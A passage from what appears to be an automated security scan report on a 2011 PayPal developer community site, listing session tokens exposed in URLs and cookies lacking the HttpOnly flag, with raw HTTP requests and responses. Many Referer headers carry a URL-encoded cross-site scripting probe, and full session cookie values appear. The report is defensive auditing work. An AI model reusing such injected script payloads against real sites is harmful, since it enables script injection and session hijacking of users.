Content-Type: image/gif
Vary: Accept-Encoding,User-Agent
JP: D=782 t=1313158269200189
Content-Length: 994
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive

GIF89a.........}.......N..k..v........g..z..r..j......"v7..j.....]..c..h...........9..w...!..*..........u...sw......ol....m..In............l........|.....W..Z.....k4..;....a..n~}....e.M.....w.....f.
...[SNIP]...

3.48. https://www.x.com/resources/scripts/fancyzoom/images/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /resources/scripts/fancyzoom/images/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /resources/scripts/fancyzoom/images/;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0closebox.png HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_ppv%3D22%3B%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:54:19 GMT
Server: Apache-Coyote/1.1
Content-Type: application/octet-stream
Content-Length: 0
JP: D=1826 t=1313157260442149
Cache-Control: max-age=2016000, public
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


3.49. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:43:17 GMT
Cache-Control: max-age=60
Content-Type: text/javascript
Content-Length: 654029
JP: D=335 t=1313157137674933
Vary: User-Agent
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

3.50. https://www.x.com/resources/scripts/gen/5542325f4f5def5174140ea38a0251ad.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /resources/scripts/gen/5542325f4f5def5174140ea38a0251ad.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /resources/scripts/gen/5542325f4f5def5174140ea38a0251ad.js;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:40:21 GMT
Cache-Control: max-age=60
Content-Type: text/javascript
Content-Length: 7809
JP: D=312 t=1313157137653284
Vary: User-Agent
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive

var jiveMenuTimeout;var jiveMenuIndex=-1;var jiveMenuID;function jiveKeypressMenuHandler(f){if(Element.visible(jiveMenuID)){var c=f.which||f.keyCode;var a;switch(c){case Event.KEY_DOWN:a=$(jiveMenuID)
...[SNIP]...

3.51. https://www.x.com/styles/jive-community.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /styles/jive-community.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /styles/jive-community.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:19 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:43:17 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 37406
JP: D=2365 t=1313157140378303
Vary: User-Agent
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

/*
jive-community.css - styles for the community landing page.
*/


.jive-blog-post-message h3 {
   clear: both;
float: none;
}

/* container for use on the community pages */
#jive-b
...[SNIP]...

3.52. https://www.x.com/styles/jive-videomodule.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /styles/jive-videomodule.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /styles/jive-videomodule.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:43:16 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 30950
JP: D=497 t=1313157137926318
Vary: User-Agent
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive

/* videomodule.css */
/* this stylesheet contains browser-specific styles for IE6 (* html) and IE7 (*+html) */

/* Styles for creating and editing a video post */
.jive-video {
clear: both;
bo
...[SNIP]...

3.53. https://www.x.com/themes/paypal/images/favicon.ico  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /themes/paypal/images/favicon.ico

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /themes/paypal/images/favicon.ico;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:27 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Etag: "3.0.7-d941befcecba314c9b3d6f0aeeb3fc0c-3638"-gzip
Content-Type: application/octet-stream
Vary: Accept-Encoding,User-Agent
JP: D=1428 t=1313157148459508
Content-Length: 3638
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive

...... ..........&...........h.......(... ...@........................................v..r7...Z*..X...p(.J...y...h...K...[...e%..o...b.{B...T...Q..._...S...[!..m..G...T$.x>...\...Y...a...S    ..K...Q
...[SNIP]...

3.54. https://www.x.com/themes/paypal/images/favicon.png  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /themes/paypal/images/favicon.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /themes/paypal/images/favicon.png;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Cache-Control: max-age=60
Content-Type: image/png
Vary: Accept-Encoding,User-Agent
JP: D=1195 t=1313157136383873
Content-Length: 967
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

.PNG
.
...IHDR... ... .....szz.....sRGB.........bKGD.............    pHYs.................tIME......*...(...GIDATX.....\E....n?.ibf....... ..8..`....B.!..P...L..4F.......w
.p.&.... .....43}.UU.E]g....
...[SNIP]...

3.55. https://www.x.com/themes/paypal/images/paypal_x_group_logo.png  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /themes/paypal/images/paypal_x_group_logo.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /themes/paypal/images/paypal_x_group_logo.png;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:08 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Cache-Control: max-age=60
Content-Type: image/png
Vary: Accept-Encoding,User-Agent
JP: D=715 t=1313158269684052
Content-Length: 1519
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive

.PNG
.
...IHDR...d.........f..-....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..XMh$U...L~....... (..0.O..$..(.....,..3^.].... 8."..d&./..Yo.v../.t.......C{P..U=U3.5.\t..Ae.._.W.......R....P.2..h...
...[SNIP]...

3.56. https://www.x.com/themes/paypal/js/custom.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /themes/paypal/js/custom.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /themes/paypal/js/custom.js;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Cache-Control: max-age=60
Content-Type: text/javascript
Content-Length: 31770
JP: D=529 t=1313157137684424
Vary: User-Agent
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.dill
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 222 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. https://www.x.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.x.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 12 Aug 2011 01:59:23 GMT
Server: Apache-Coyote/1.1
Location: https://www.x.com/index.jspa
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; Path=/
Set-Cookie: jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; Version=1; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=1446 t=1313114363172657
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: NSC_xxx.y.dpn-443=44ed4e27151d;path=/


4.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/josh/2011/03/29/paypal-integration-resources

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/josh/2011/03/29/paypal-integration-resources HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=80251 t=1313157101873077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/matt/2010/08/10/retrieving-your-api-credentials

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/matt/2010/08/10/retrieving-your-api-credentials HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=155557 t=1313157101339194
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.4. https://www.x.com/community/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/home HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:30 GMT; Path=/
Vary: User-Agent
JP: D=85622 t=1313157030208430
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.5. https://www.x.com/community/ppx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323232363b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:24 GMT; Path=/
Vary: User-Agent
JP: D=86365 t=1313157084689243
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.6. https://www.x.com/community/ppx/adaptive_accounts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_accounts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/adaptive_accounts HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031383b31342c323036333b31342c323031373b31342c323031363b31342c323030363b31342c323234363b31342c323031353b31342c323031333b31342c323236393b31342c323232313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=100210 t=1313157059307917
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.7. https://www.x.com/community/ppx/adaptive_payments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_payments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/adaptive_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031303b31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=110512 t=1313157031704201
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.8. https://www.x.com/community/ppx/apps101  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/apps101

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/apps101 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
